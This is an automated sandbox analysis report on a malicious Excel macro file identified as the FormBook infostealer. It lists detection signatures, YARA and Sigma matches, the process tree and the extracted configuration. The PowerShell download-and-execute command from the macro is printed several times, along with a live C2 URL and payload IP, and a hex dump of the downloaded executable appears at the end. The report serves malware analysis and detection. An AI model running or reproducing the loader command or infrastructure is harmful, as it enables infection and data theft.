Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report purchase Order.xlsm

Overview

General Information

Sample Name:purchase Order.xlsm
Analysis ID:510341
MD5:d1ad5761044b2abb12b78700f1a3a537
SHA1:7fed2064ae3681227f674608df64ff1d7c45a2ee
SHA256:8024e6dc8c230782b570a234318ba7b5a72f64ad5a1a3ff81584e080d9338eba
Tags:xlsm
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Found detection on Joe Sandbox Cloud Basic with higher score
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Microsoft Office Product Spawning Windows Shell
Injects a PE file into a foreign processes
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Checks if the current process is being debugged
Drops PE files to the user directory
Dropped file seen in connection with other malware
Excel documents contains an embedded macro which executes code when the document is opened
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5708 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • powershell.exe (PID: 6124 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • explorer.exe (PID: 6892 cmdline: 'C:\Windows\system32\explorer.exe' C:\Users\Public\eVJOpc.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • explorer.exe (PID: 7112 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • eVJOpc.exe (PID: 1840 cmdline: 'C:\Users\Public\eVJOpc.exe' MD5: 0EDC34831B45EDED59BD2AEEF85AA41B)
      • eVJOpc.exe (PID: 4104 cmdline: 'C:\Users\Public\eVJOpc.exe' MD5: 0EDC34831B45EDED59BD2AEEF85AA41B)
        • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • wlanext.exe (PID: 5660 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
            • cmd.exe (PID: 2316 cmdline: /c del 'C:\Users\Public\eVJOpc.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 2260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.art-for-a-cause.com/m5cw/"], "decoy": ["stolpfabriken.com", "aromaessentialco.com", "rmcclaincpa.com", "wuruixin.com", "sidhyanticlasses.com", "horilka.store", "organic-outlaws.com", "customsoftwarelogistics.com", "cheryltesting.com", "thecompacthomegym.com", "the22yards.club", "quickloanprovidersservices.com", "grippyent.com", "guard-usa.com", "agircredit.com", "classificationmetallurgie.com", "quizzesandcode.com", "catdanos.com", "8676789.rest", "gotbestshavlngplansforyou.com", "supboarddesign.com", "byrdemailplans.xyz", "anngola.com", "milelefoods.com", "runawaypklyau.xyz", "redesignyourpain.com", "yourtv2ship.info", "jxypc.com", "lerjighjuij.store", "spiruline-shop.com", "qarziba-therapy.care", "hardayumangosteen.com", "freevolttech.com", "xiongbaosp.xyz", "balanzasdeplataforma.com", "johnathanmanney.com", "estcequecestgreen.com", "france-temps-partage.net", "fbiicrc.com", "privateairjets.com", "xn--5m4a23skoc.group", "andrewmurnane.com", "exitin90.com", "depofmvz.com", "bosphorus.website", "aragon.store", "nrnmuhendislik.com", "thesharingcorporation.com", "tccraft.online", "carjabber.com", "limitlesschurchbf.com", "dazalogistics.com", "x-play.club", "bitterbay.net", "forwardhcd.com", "smance.xyz", "netgearcloud.net", "wellaspiron.com", "heidelay.xyz", "qknzutohbtro.mobi", "epurhybrid.com", "pelitupmukaeksklusif.com", "secondave.online", "lockdownshowdown.online"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
      • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
      • 0x16af8:$sqlite3text: 68 38 2A 90 C5
      • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
      • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
      00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        Click to see the 26 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        8.2.eVJOpc.exe.f040000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          8.2.eVJOpc.exe.f040000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          8.2.eVJOpc.exe.f040000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x15cc9:$sqlite3step: 68 34 1C 7B E1
          • 0x15ddc:$sqlite3step: 68 34 1C 7B E1
          • 0x15cf8:$sqlite3text: 68 38 2A 90 C5
          • 0x15e1d:$sqlite3text: 68 38 2A 90 C5
          • 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
          9.2.eVJOpc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            9.2.eVJOpc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 28 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine|base64offset|contains: z), Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5708, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, ProcessId: 6124
            Sigma detected: Execution from Suspicious FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\eVJOpc.exe' , CommandLine: 'C:\Users\Public\eVJOpc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\eVJOpc.exe, NewProcessName: C:\Users\Public\eVJOpc.exe, OriginalFileName: C:\Users\Public\eVJOpc.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 7112, ProcessCommandLine: 'C:\Users\Public\eVJOpc.exe' , ProcessId: 1840
            Sigma detected: Windows Suspicious Use Of Web Request in CommandLineShow sources
            Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine|base64offset|contains: z), Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5708, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, ProcessId: 6124
            Sigma detected: Non Interactive PowerShellShow sources
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine|base64offset|contains: z), Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5708, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, ProcessId: 6124
            Sigma detected: T1086 PowerShell ExecutionShow sources
            Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132798575499604118.6124.DefaultAppDomain.powershell

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.art-for-a-cause.com/m5cw/"], "decoy": ["stolpfabriken.com", "aromaessentialco.com", "rmcclaincpa.com", "wuruixin.com", "sidhyanticlasses.com", "horilka.store", "organic-outlaws.com", "customsoftwarelogistics.com", "cheryltesting.com", "thecompacthomegym.com", "the22yards.club", "quickloanprovidersservices.com", "grippyent.com", "guard-usa.com", "agircredit.com", "classificationmetallurgie.com", "quizzesandcode.com", "catdanos.com", "8676789.rest", "gotbestshavlngplansforyou.com", "supboarddesign.com", "byrdemailplans.xyz", "anngola.com", "milelefoods.com", "runawaypklyau.xyz", "redesignyourpain.com", "yourtv2ship.info", "jxypc.com", "lerjighjuij.store", "spiruline-shop.com", "qarziba-therapy.care", "hardayumangosteen.com", "freevolttech.com", "xiongbaosp.xyz", "balanzasdeplataforma.com", "johnathanmanney.com", "estcequecestgreen.com", "france-temps-partage.net", "fbiicrc.com", "privateairjets.com", "xn--5m4a23skoc.group", "andrewmurnane.com", "exitin90.com", "depofmvz.com", "bosphorus.website", "aragon.store", "nrnmuhendislik.com", "thesharingcorporation.com", "tccraft.online", "carjabber.com", "limitlesschurchbf.com", "dazalogistics.com", "x-play.club", "bitterbay.net", "forwardhcd.com", "smance.xyz", "netgearcloud.net", "wellaspiron.com", "heidelay.xyz", "qknzutohbtro.mobi", "epurhybrid.com", "pelitupmukaeksklusif.com", "secondave.online", "lockdownshowdown.online"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: purchase Order.xlsmVirustotal: Detection: 22%Perma Link
            Source: purchase Order.xlsmReversingLabs: Detection: 40%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: purchase Order.xlsmAvira: detected
            Antivirus detection for URL or domainShow sources
            Source: www.art-for-a-cause.com/m5cw/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URLShow sources
            Source: http://212.192.241.75/sam/new3.exeVirustotal: Detection: 11%Perma Link
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dllAvira: detection malicious, Label: TR/Tesla.ivvdd
            Source: C:\Users\Public\eVJOpc.exeAvira: detection malicious, Label: TR/Tesla.amqdv
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\Public\eVJOpc.exeReversingLabs: Detection: 50%
            Source: C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dllReversingLabs: Detection: 37%
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\Public\eVJOpc.exeJoe Sandbox ML: detected
            Source: 8.2.eVJOpc.exe.f040000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 9.2.eVJOpc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 9.1.eVJOpc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 9.0.eVJOpc.exe.400000.3.unpackAvira: Label: TR/Patched.Ren.Gen2
            Source: 19.2.wlanext.exe.2e7de48.1.unpackAvira: Label: TR/Patched.Ren.Gen
            Source: 9.0.eVJOpc.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 9.0.eVJOpc.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
            Source: 9.0.eVJOpc.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 9.0.eVJOpc.exe.400000.2.unpackAvira: Label: TR/Patched.Ren.Gen2
            Source: 9.0.eVJOpc.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 9.0.eVJOpc.exe.400000.1.unpackAvira: Label: TR/Patched.Ren.Gen2
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
            Source: Binary string: wntdll.pdbUGP source: eVJOpc.exe, 00000008.00000003.370323842.000000000F210000.00000004.00000001.sdmp, eVJOpc.exe, 00000009.00000002.452970458.0000000000B20000.00000040.00000001.sdmp, wlanext.exe, 00000013.00000002.564446547.00000000033CF000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: eVJOpc.exe, wlanext.exe
            Source: Binary string: wlanext.pdb source: eVJOpc.exe, 00000009.00000002.452915644.0000000000AD0000.00000040.00020000.sdmp
            Source: Binary string: wlanext.pdbGCTL source: eVJOpc.exe, 00000009.00000002.452915644.0000000000AD0000.00000040.00020000.sdmp
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_00405E93 FindFirstFileA,FindClose,
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_00402671 FindFirstFileA,

            Software Vulnerabilities:

            barindex
            Document exploit detected (process start blacklist hit)Show sources
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Source: global trafficTCP traffic: 192.168.2.3:49746 -> 212.192.241.75:80
            Source: global trafficTCP traffic: 192.168.2.3:49746 -> 212.192.241.75:80
            Source: excel.exeMemory has grown: Private usage: 1MB later: 68MB

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.art-for-a-cause.com/m5cw/
            Source: Joe Sandbox ViewASN Name: RAPMSB-ASRU RAPMSB-ASRU
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Oct 2021 16:19:34 GMTServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30Last-Modified: Tue, 26 Oct 2021 23:46:46 GMTETag: "41504-5cf4a171fd45b"Accept-Ranges: bytesContent-Length: 267524Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d6 01 00 00 04 00 00 fb 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 74 00 00 a0 00 00 00 00 d0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 9c f1 03 00 68 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 eb 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 b0 01 00 00 90 00 00 00 06 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 d0 02 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 